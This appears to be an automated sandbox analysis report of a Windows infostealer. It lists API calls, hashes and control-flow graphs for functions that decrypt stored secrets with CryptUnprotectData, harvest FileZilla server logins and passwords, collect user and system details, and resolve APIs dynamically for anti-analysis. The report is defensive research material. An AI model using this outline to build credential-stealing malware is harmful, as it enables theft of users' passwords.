                                                                                                                                                        • Opcode ID: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
                                                                                                                                                        • Instruction ID: 63b956e3650aea0bdd01ac085b80a838c67200ff8d98e36f2a49cf33a9f6a1bd
                                                                                                                                                        • Opcode Fuzzy Hash: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
                                                                                                                                                        • Instruction Fuzzy Hash: C7F06770E047289BDB309B64DD49FA9737ABB44311F0002D5EA0AE3291DB749E858F97
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004095AF
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2068576380-0
                                                                                                                                                        • Opcode ID: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
                                                                                                                                                        • Instruction ID: 845aa5354f8c35be15d3c308e338542aeef751caf2e905b87ee6994bb5fcaacd
                                                                                                                                                        • Opcode Fuzzy Hash: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
                                                                                                                                                        • Instruction Fuzzy Hash: 2B11B7B8A00609EFCB04DF94C984AAEB7B5FF88301F104559E915A7390D774AE51CBA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00401177,043306D0,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                        • GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocNameProcessUser
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1206570057-0
                                                                                                                                                        • Opcode ID: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
                                                                                                                                                        • Instruction ID: fd22aaf49eebc4deedfa71bce2fb200d05227bfc9b63873cd8cb515d50d954e6
                                                                                                                                                        • Opcode Fuzzy Hash: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
                                                                                                                                                        • Instruction Fuzzy Hash: 2CE08CB490070CFFCB20EFE4DC49E9CBBB8AB08312F000184FA09E3280DB7056848B91
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
                                                                                                                                                        • ExitProcess.KERNEL32 ref: 0040113E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExitInfoProcessSystem
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 752954902-0
                                                                                                                                                        • Opcode ID: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
                                                                                                                                                        • Instruction ID: 30efb513975bfe185fa80fb3a8f84b393628ccfbb0aa9170a1b214bc368b0093
                                                                                                                                                        • Opcode Fuzzy Hash: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
                                                                                                                                                        • Instruction Fuzzy Hash: B6D05E7490020C8BCB14DFE09A496DDBBB9AB8D711F001455DD0572240DA305441CA65
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,0098967F,?,00413068,?), ref: 004070F4
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,00413068,?), ref: 004070FB
                                                                                                                                                        • lstrcat.KERNEL32(?,043337E8), ref: 004072AB
                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 004072BF
                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 004072D3
                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 004072E7
                                                                                                                                                        • lstrcat.KERNEL32(?,04336A80), ref: 004072FB
                                                                                                                                                        • lstrcat.KERNEL32(?,04336900), ref: 0040730F
                                                                                                                                                        • lstrcat.KERNEL32(?,04338830), ref: 00407322
                                                                                                                                                        • lstrcat.KERNEL32(?,04338878), ref: 00407336
                                                                                                                                                        • lstrcat.KERNEL32(?,04333870), ref: 0040734A
                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 0040735E
                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 00407372
                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 00407386
                                                                                                                                                        • lstrcat.KERNEL32(?,04336A80), ref: 00407399
                                                                                                                                                        • lstrcat.KERNEL32(?,04336900), ref: 004073AD
                                                                                                                                                        • lstrcat.KERNEL32(?,04338830), ref: 004073C1
                                                                                                                                                        • lstrcat.KERNEL32(?,04338878), ref: 004073D4
                                                                                                                                                        • lstrcat.KERNEL32(?,043338D8), ref: 004073E8
                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 004073FC
                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 00407410
                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 00407424
                                                                                                                                                        • lstrcat.KERNEL32(?,04336A80), ref: 00407438
                                                                                                                                                        • lstrcat.KERNEL32(?,04336900), ref: 0040744B
                                                                                                                                                        • lstrcat.KERNEL32(?,04338830), ref: 0040745F
                                                                                                                                                        • lstrcat.KERNEL32(?,04338878), ref: 00407473
                                                                                                                                                        • lstrcat.KERNEL32(?,04337F90), ref: 00407486
                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 0040749A
                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 004074AE
                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 004074C2
                                                                                                                                                        • lstrcat.KERNEL32(?,04336A80), ref: 004074D6
                                                                                                                                                        • lstrcat.KERNEL32(?,04336900), ref: 004074EA
                                                                                                                                                        • lstrcat.KERNEL32(?,04338830), ref: 004074FD
                                                                                                                                                        • lstrcat.KERNEL32(?,04338878), ref: 00407511
                                                                                                                                                        • lstrcat.KERNEL32(?,04337FF8), ref: 00407525
                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 00407539
                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 0040754D
                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 00407561
                                                                                                                                                        • lstrcat.KERNEL32(?,04336A80), ref: 00407574
                                                                                                                                                        • lstrcat.KERNEL32(?,04336900), ref: 00407588
                                                                                                                                                        • lstrcat.KERNEL32(?,04338830), ref: 0040759C
                                                                                                                                                        • lstrcat.KERNEL32(?,04338878), ref: 004075AF
                                                                                                                                                        • lstrcat.KERNEL32(?,04338060), ref: 004075C3
                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 004075D7
                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 004075EB
                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 004075FF
                                                                                                                                                        • lstrcat.KERNEL32(?,04336A80), ref: 00407613
                                                                                                                                                        • lstrcat.KERNEL32(?,04336900), ref: 00407626
                                                                                                                                                        • lstrcat.KERNEL32(?,04338830), ref: 0040763A
                                                                                                                                                        • lstrcat.KERNEL32(?,04338878), ref: 0040764E
                                                                                                                                                          • Part of subcall function 00406FA0: lstrcat.KERNEL32(30AA7020,0041DEB8), ref: 00406FD6
                                                                                                                                                          • Part of subcall function 00406FA0: lstrcat.KERNEL32(30AA7020,00000000), ref: 00407018
                                                                                                                                                          • Part of subcall function 00406FA0: lstrcat.KERNEL32(30AA7020, : ), ref: 0040702A
                                                                                                                                                          • Part of subcall function 00406FA0: lstrcat.KERNEL32(30AA7020,00000000), ref: 0040705F
                                                                                                                                                          • Part of subcall function 00406FA0: lstrcat.KERNEL32(30AA7020,0041DEC0), ref: 00407070
                                                                                                                                                          • Part of subcall function 00406FA0: lstrcat.KERNEL32(30AA7020,00000000), ref: 004070A3
                                                                                                                                                          • Part of subcall function 00406FA0: lstrcat.KERNEL32(30AA7020,0041DEC4), ref: 004070BD
                                                                                                                                                          • Part of subcall function 00406FA0: task.LIBCPMTD ref: 004070CB
                                                                                                                                                        • lstrcat.KERNEL32(?,04330840), ref: 004077DB
                                                                                                                                                        • lstrcat.KERNEL32(?,043372B0), ref: 004077EE
                                                                                                                                                        • lstrlen.KERNEL32(30AA7020), ref: 004077FB
                                                                                                                                                        • lstrlen.KERNEL32(30AA7020), ref: 0040780B
                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                          • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                          • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                          • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04330750), ref: 00404ED9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcat$lstrlen$Heap$AllocateInternetOpenProcesslstrcpytask
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3958002797-0
                                                                                                                                                        • Opcode ID: 1a4790090b2145be4414eb9d8ec18fb4d399ff29a204be037550b3e2c137635a
                                                                                                                                                        • Instruction ID: 3e78b0701875fb024adfa953bd7607f570b92d72e3b87f8e208063dda3fe5bd2
                                                                                                                                                        • Opcode Fuzzy Hash: 1a4790090b2145be4414eb9d8ec18fb4d399ff29a204be037550b3e2c137635a
                                                                                                                                                        • Instruction Fuzzy Hash: D33234B6D01A14ABCB35EBA0DC89DDE737DAB48704F404699B20A66090DF78E7C5CF94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 187 40ea90-40eb22 call 416d40 call 4154e0 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416da0 call 4093a0 209 40eb27-40eb2c 187->209 210 40ef60-40ef73 call 416e00 call 413220 209->210 211 40eb32-40eb49 call 415530 209->211 211->210 217 40eb4f-40ebaf strtok_s call 416d40 * 4 GetProcessHeap HeapAlloc 211->217 227 40ebb2-40ebb6 217->227 228 40eeca-40ef5b lstrlen call 416da0 call 401500 call 404dc0 call 416e00 memset call 417040 * 4 call 416e00 * 4 227->228 229 40ebbc-40ebcd StrStrA 227->229 228->210 230 40ec06-40ec17 StrStrA 229->230 231 40ebcf-40ec01 lstrlen call 414fa0 call 416ea0 call 416e00 229->231 234 40ec50-40ec61 StrStrA 230->234 235 40ec19-40ec4b lstrlen call 414fa0 call 416ea0 call 416e00 230->235 231->230 237 40ec63-40ec95 lstrlen call 414fa0 call 416ea0 call 416e00 234->237 238 40ec9a-40ecab StrStrA 234->238 235->234 237->238 246 40ecb1-40ed03 lstrlen call 414fa0 call 416ea0 call 416e00 call 4170d0 call 4094a0 238->246 247 40ed39-40ed4b call 4170d0 lstrlen 238->247 246->247 288 40ed05-40ed34 call 416e20 call 416fb0 call 416ea0 call 416e00 246->288 260 40ed51-40ed63 call 4170d0 lstrlen 247->260 261 40eeaf-40eec5 strtok_s 247->261 260->261 274 40ed69-40ed7b call 4170d0 lstrlen 260->274 261->227 274->261 283 40ed81-40ed93 call 4170d0 lstrlen 274->283 283->261 292 40ed99-40eeaa lstrcat * 3 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 3 call 4170d0 lstrcat * 3 call 4170d0 lstrcat * 3 call 416e20 * 4 283->292 288->247 292->261
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                          • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                          • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                          • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                          • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                          • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                          • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                          • Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                          • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                                                                        • strtok_s.MSVCRT ref: 0040EB5B
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F,0041D77A,0041D777,0041D776,0041D773), ref: 0040EBA2
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EBA9
                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040EBC5
                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040EBD3
                                                                                                                                                          • Part of subcall function 00414FA0: malloc.MSVCRT ref: 00414FA8
                                                                                                                                                          • Part of subcall function 00414FA0: strncpy.MSVCRT ref: 00414FC3
                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040EC0F
                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040EC1D
                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 0040EC59
                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040EC67
                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040ECA3
                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040ECB5
                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040ED42
                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED5A
                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED72
                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED8A
                                                                                                                                                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 0040EDA2
                                                                                                                                                        • lstrcat.KERNEL32(?,profile: null), ref: 0040EDB1
                                                                                                                                                        • lstrcat.KERNEL32(?,url: ), ref: 0040EDC0
                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040EDD3
                                                                                                                                                        • lstrcat.KERNEL32(?,0041DD34), ref: 0040EDE2
                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040EDF5
                                                                                                                                                        • lstrcat.KERNEL32(?,0041DD38), ref: 0040EE04
                                                                                                                                                        • lstrcat.KERNEL32(?,login: ), ref: 0040EE13
                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040EE26
                                                                                                                                                        • lstrcat.KERNEL32(?,0041DD44), ref: 0040EE35
                                                                                                                                                        • lstrcat.KERNEL32(?,password: ), ref: 0040EE44
                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040EE57
                                                                                                                                                        • lstrcat.KERNEL32(?,0041DD54), ref: 0040EE66
                                                                                                                                                        • lstrcat.KERNEL32(?,0041DD58), ref: 0040EE75
                                                                                                                                                        • strtok_s.MSVCRT ref: 0040EEB9
                                                                                                                                                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EECE
                                                                                                                                                        • memset.MSVCRT ref: 0040EF17
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$ChangeCloseCreateFindFolderFreeNotificationPathProcessReadSizemallocmemsetstrncpy
                                                                                                                                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                                                                                                                        • API String ID: 1266801029-555421843
                                                                                                                                                        • Opcode ID: a0f53b9dee15c23e45b6c59822f111f8c24a56193fda47159abce8afca70eb89
                                                                                                                                                        • Instruction ID: d9186ee441f73b04c887f2efee86d04259a2264df0fa853aa1509dbc15227f06
                                                                                                                                                        • Opcode Fuzzy Hash: a0f53b9dee15c23e45b6c59822f111f8c24a56193fda47159abce8afca70eb89
                                                                                                                                                        • Instruction Fuzzy Hash: 3FD174B5D00208ABCB14EBF1DD56EEE7739AF44304F50851EF106B6095DF38AA85CBA8
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 322 415ed0-415ee4 call 415dc0 325 416103-416162 LoadLibraryA * 5 322->325 326 415eea-4160fe call 415df0 GetProcAddress * 21 322->326 328 416164-416178 GetProcAddress 325->328 329 41617d-416184 325->329 326->325 328->329 331 4161b6-4161bd 329->331 332 416186-4161b1 GetProcAddress * 2 329->332 333 4161d8-4161df 331->333 334 4161bf-4161d3 GetProcAddress 331->334 332->331 335 4161e1-4161f4 GetProcAddress 333->335 336 4161f9-416200 333->336 334->333 335->336 337 416231-416232 336->337 338 416202-41622c GetProcAddress * 2 336->338 338->337
                                                                                                                                                        APIs
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,043129A0), ref: 00415F11
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04312928), ref: 00415F2A
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,043128E0), ref: 00415F42
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,043128F8), ref: 00415F5A
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04312910), ref: 00415F73
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,0432E3B8), ref: 00415F8B
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04314538), ref: 00415FA3
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04314478), ref: 00415FBC
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04330228), ref: 00415FD4
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04330300), ref: 00415FEC
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,043301E0), ref: 00416005
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04330180), ref: 0041601D
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,043143D8), ref: 00416035
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,043303C0), ref: 0041604E
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04330318), ref: 00416066
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04314378), ref: 0041607E
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04330270), ref: 00416097
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,043301B0), ref: 004160AF
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04314518), ref: 004160C7
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,043302E8), ref: 004160E0
                                                                                                                                                        • GetProcAddress.KERNEL32(74DD0000,04314618), ref: 004160F8
                                                                                                                                                        • LoadLibraryA.KERNEL32(04330150,?,004136C0), ref: 0041610A
                                                                                                                                                        • LoadLibraryA.KERNEL32(04330198,?,004136C0), ref: 0041611B
                                                                                                                                                        • LoadLibraryA.KERNEL32(043301F8,?,004136C0), ref: 0041612D
                                                                                                                                                        • LoadLibraryA.KERNEL32(04330288,?,004136C0), ref: 0041613F
                                                                                                                                                        • LoadLibraryA.KERNEL32(04330108,?,004136C0), ref: 00416150
                                                                                                                                                        • GetProcAddress.KERNEL32(75A70000,04330258), ref: 00416172
                                                                                                                                                        • GetProcAddress.KERNEL32(75290000,043300D8), ref: 00416193
                                                                                                                                                        • GetProcAddress.KERNEL32(75290000,04330348), ref: 004161AB
                                                                                                                                                        • GetProcAddress.KERNEL32(75BD0000,043302A0), ref: 004161CD
                                                                                                                                                        • GetProcAddress.KERNEL32(75450000,04314338), ref: 004161EE
                                                                                                                                                        • GetProcAddress.KERNEL32(76E90000,0432E3C8), ref: 0041620F
                                                                                                                                                        • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00416226
                                                                                                                                                        Strings
                                                                                                                                                        • NtQueryInformationProcess, xrefs: 0041621A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                                                        • String ID: NtQueryInformationProcess
                                                                                                                                                        • API String ID: 2238633743-2781105232
                                                                                                                                                        • Opcode ID: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
                                                                                                                                                        • Instruction ID: 1024ce913f91588aaf476b7e35ab3ad31cc185c195c2877b0ef9f81f7e935ec9
                                                                                                                                                        • Opcode Fuzzy Hash: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
                                                                                                                                                        • Instruction Fuzzy Hash: 4CA16FB5910E10AFC374DFA8FE88A1637BBBBCC3117116519A60AC72A0DF759482CF95
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
